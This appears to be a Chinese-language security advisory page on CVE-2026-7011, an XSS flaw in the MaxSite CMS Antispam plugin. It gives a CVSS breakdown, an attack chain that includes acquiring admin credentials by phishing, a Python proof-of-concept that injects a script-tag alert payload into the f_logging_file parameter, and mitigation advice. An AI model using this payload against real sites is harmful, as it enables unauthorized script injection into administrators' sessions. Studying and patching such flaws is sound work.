CVE-2026-7011 CVSS 2.4 低危

CVE-2026-7011 MaxSite CMS跨站脚本漏洞

披露日期: 2026-04-26

来源: [email protected]

漏洞信息

漏洞编号

CVE-2026-7011

漏洞类型

XSS (跨站脚本)

CVSS评分

2.4 低危

攻击向量

网络 (AV:N)

认证要求

高权限 (PR:H)

用户交互

需要交互 (UI:R)

影响产品

MaxSite CMS

漏洞概述

MaxSite CMS 109.3及之前版本中的Antispam插件存在跨站脚本漏洞。该漏洞源于/admin/plugin_antispam文件对f_logging_file参数处理不当，缺乏htmlspecialchars过滤。攻击者可注入恶意脚本，需高权限及用户交互。厂商已发布109.4版本修复该问题。

技术细节

该漏洞存在于MaxSite CMS的Antispam插件组件中，具体涉及/admin/plugin_antispam文件的处理逻辑。漏洞根本原因在于未对用户提交的f_logging_file参数进行充分的输出编码。当管理员配置该插件时，系统直接回显该参数值而未调用htmlspecialchars()函数进行转义，导致攻击者可植入恶意JavaScript。尽管厂商将其定义为“Self-XSS”，但根据CVSS 3.1向量（AV:N/AC:L/PR:H/UI:R/S:U/C:N/I:L/A:N），攻击者可远程利用此漏洞，利用高权限身份进行操作，最终影响完整性。修复补丁通过添加必要的过滤机制解决了此编码标准违规问题。

攻击链分析

STEP 1

1. 信息收集

攻击者识别目标运行MaxSite CMS且版本低于或等于109.3。

STEP 2

2. 权限获取

攻击者需要获取管理员权限账户（高权限要求），通常通过钓鱼或凭据窃取。

STEP 3

3. 漏洞利用

攻击者向/admin/plugin_antispam发送POST请求，在f_logging_file参数中注入XSS Payload。

STEP 4

4. 触发执行

诱导管理员或其他用户访问受影响的插件页面，触发恶意脚本执行。

PoC / 利用代码

⚠️ 仅供安全研究

以下代码仅用于安全研究和授权测试，未经授权使用属于违法行为。

PoC

# Proof of Concept for CVE-2026-7011
# This script demonstrates the XSS vulnerability in MaxSite CMS <= 109.3
# via the 'f_logging_file' parameter in the Antispam plugin.

import requests

target_url = "http://example.com/admin/plugin_antispam"
session = requests.Session()
# Assume authentication is required (PR:H)
login_payload = {"user": "admin", "pass": "password"}
session.post("http://example.com/login", data=login_payload)

# Exploit payload injection
xss_payload = "<script>alert('CVE-2026-7011');</script>"
data = {
    "f_logging_file": xss_payload,
    "action": "update_config"
}

response = session.post(target_url, data=data)

if response.status_code == 200:
    print("[+] Payload sent successfully. Check the admin page for XSS trigger.")
else:
    print("[-] Failed to send payload.")

影响范围

MaxSite CMS <= 109.3

防御指南

临时缓解措施

在未升级前，限制对后台管理面板的访问，实施严格的访问控制策略，并确保所有管理员账户使用强密码以防止权限被窃取。

参考链接

快速导航: 前沿安全最新收录域名列表最新威胁情报列表最新网站排名列表最新工具资源列表最新CVE漏洞列表